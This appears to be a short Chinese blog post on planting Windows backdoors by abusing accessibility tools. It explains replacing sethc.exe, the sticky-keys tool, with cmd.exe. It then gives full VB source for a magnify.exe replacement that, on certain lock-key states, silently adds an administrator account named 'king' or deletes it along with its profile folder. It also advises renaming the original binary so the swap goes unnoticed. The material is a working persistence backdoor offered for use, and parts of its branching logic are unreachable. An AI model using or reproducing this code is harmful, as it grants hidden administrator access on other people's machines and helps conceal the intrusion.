后门小技巧(系统工具利用)
学到的几个留下后门的小方法。
1.粘滞带后门
这个应该是大家都比较熟悉的了,打开粘滞带就是连按5下shift 会默认打开sethc.exe这个小工具。直接将CMD.EXE替换掉sethc.exe这样就算一个小后门了。
不过貌似用这个的人确实很多,所以出现了网上许多人的加密版本。
2.其他系统工具的利用
其实其他快捷键能呼出的系统工具一般都是可以利用的。这里看到的是利用系统的放大镜功能,就是magnify.exe。
利用GetKeyState()这个函数检查键盘上的几个特殊键的状态,来执行shell命令添加系统账号。
利用VB编写一段小程序就可以了,届时替换掉系统中的magnify.exe就可以了,不过记得把原程序改名,不然不能启动一下就被发现了。比如将原程序写成mag.exe
VB代码:
Declare Function GetKeyState Lib “user32″ (ByVal nVirtKey As Long) As Integer
Sub Main()
If GetKeyState(20) = 1 Then
If GetKeyState(144) = 1 Then
If GetKeyState(145) = 1 Then
Shell (“net1 user king king /add”)
Shell (“net1 localgroup administrators king /add”)
ElseIf GetKeyState(145) = 0 Then
Shell (“net1 user king /del”)
Shell (“cmd.exe /c rd /s /q \\.\\c:\docume~1\king“)
ElseIf GetKeyState(144) = 1 Then
Shell (“mag.exe”)
ElseIf GetKeyState(20) = 1 Then
Shell (“mag.exe”)
End If
End If
End If
End Sub